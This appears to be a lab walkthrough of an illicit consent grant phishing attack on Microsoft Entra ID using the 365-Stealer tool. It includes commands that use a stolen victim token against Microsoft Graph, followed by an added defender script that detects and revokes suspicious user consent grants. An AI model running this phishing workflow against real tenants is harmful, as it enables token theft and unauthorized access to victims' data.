Illicit Consent Grant
When we have initial access to a user, we can register an application from that user's account: by default, ordinary users are allowed to register applications in the tenant.
With this application we can ask another user to consent to the permissions our application requests. When the user consents, we get an access token issued for that user. With this access token we can interact with, for example, the Microsoft Graph API on the victim's behalf.

Attack
We first go to https://portal.azure.com and register an application from our initial access user. As the redirect URL we should use a URL that we own, for example https://172.16.10.10/login/authorized. For the permissions, we add User.ReadBasic.All:

Next, we spin up a tool called 365-Stealer, created by Altered Security, which provides a GUI to manage the phishing side of this attack: https://github.com/AlteredSecurity/365-Stealer. This tool allows us to fill in the app's information:

If we save and run the attack, a shell pops up with a phishing link:

We send this link to the victim. If the victim consents to our application, we receive an update in the GUI:

We can copy the access_token and use it to connect to Microsoft Graph:
PS C:\Windows\system32> $token = 'eY.....'
PS C:\Windows\system32> Connect-MgGraph -AccessToken ($Token | ConvertTo-SecureString -AsPlainText -Force)
Welcome to Microsoft Graph!
Connected via userprovidedaccesstoken access using bd46fc07-1626-43be-80b7-fkfkfkf
Readme: https://aka.ms/graph/sdk/powershell
SDK Docs: https://aka.ms/graph/sdk/powershell/docs
API Docs: https://aka.ms/graph/docs
NOTE: You can use the -NoWelcome parameter to suppress this message.
PS C:\Windows\system32> Get-MgContext
ClientId : bd46fc07-1626-43be-80b7fgfgfgfgff
TenantId : 2d50cb29-5f7b-48a4-87ceffgffgfgfg
Scopes : {User.Read, User.ReadBasic.All, profile, openid...}
AuthType : UserProvidedAccessToken
TokenCredentialType : UserProvidedAccessToken
CertificateThumbprint :
CertificateSubjectName :
SendCertificateChain : False
Account : [email protected]
AppName : student60
ContextScope : Process
Certificate :
PSHostVersion : 5.1.17763.1490
ManagedIdentityId :
ClientSecret :
Environment : Global
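A defender-side check, added here and not part of the original page or of 365-Stealer: it lists the delegated grants that individual users consented to and highlights the signals visible in the attack above (a reply URL pointing at a bare IP address, an app owned by another tenant, or scopes beyond basic sign-in). It assumes the Microsoft.Graph PowerShell SDK and an account holding Directory.Read.All; $baseline is my own allowlist, not a Microsoft default.

```powershell
# Added example (not from the original page or 365-Stealer): enumerate user-consented
# delegated grants so a defender can spot an illicit consent grant like the one above.
# Assumes the Microsoft.Graph PowerShell SDK and a caller holding Directory.Read.All.
Connect-MgGraph -Scopes 'Directory.Read.All' -NoWelcome
$tenantId = (Get-MgContext).TenantId

# ConsentType 'Principal' = consent given by an individual user; 'AllPrincipals' = admin consent.
$grants = Get-MgOauth2PermissionGrant -All | Where-Object { $_.ConsentType -eq 'Principal' }

# Scopes a normal sign-in needs; anything beyond these deserves a look (assumed allowlist).
$baseline = 'openid', 'profile', 'email', 'offline_access', 'User.Read'
# Reply URLs on a raw IP address, like https://172.16.10.10/... above, are rarely legitimate.
$ipReplyUrl = '^https?://\d{1,3}(\.\d{1,3}){3}'

$findings = foreach ($g in $grants) {
    $client = Get-MgServicePrincipal -ServicePrincipalId $g.ClientId
    $user   = Get-MgUser -UserId $g.PrincipalId -ErrorAction SilentlyContinue
    $scopes = ("$($g.Scope)").Trim() -split '\s+' | Where-Object { $_ }
    [pscustomobject]@{
        App         = $client.DisplayName
        AppId       = $client.AppId
        ForeignApp  = ($client.AppOwnerOrganizationId -ne $tenantId)   # registered in another tenant
        IpReplyUrl  = [bool]($client.ReplyUrls | Where-Object { $_ -match $ipReplyUrl })
        ExtraScopes = ($scopes | Where-Object { $_ -notin $baseline }) -join ' '
        ConsentedBy = $user.UserPrincipalName
        GrantId     = $g.Id   # needed if the grant has to be revoked
    }
}

# Show only grants with at least one risk signal, riskiest first.
$findings |
    Where-Object { $_.ForeignApp -or $_.IpReplyUrl -or $_.ExtraScopes } |
    Sort-Object IpReplyUrl, ForeignApp -Descending |
    Format-Table App, ConsentedBy, ExtraScopes, IpReplyUrl, ForeignApp, GrantId -AutoSize
```

A grant confirmed as illicit can be revoked with Remove-MgOauth2PermissionGrant -OAuth2PermissionGrantId <GrantId>, and the tenant-wide user consent setting in Entra ID restricts which applications users may consent to in the first place.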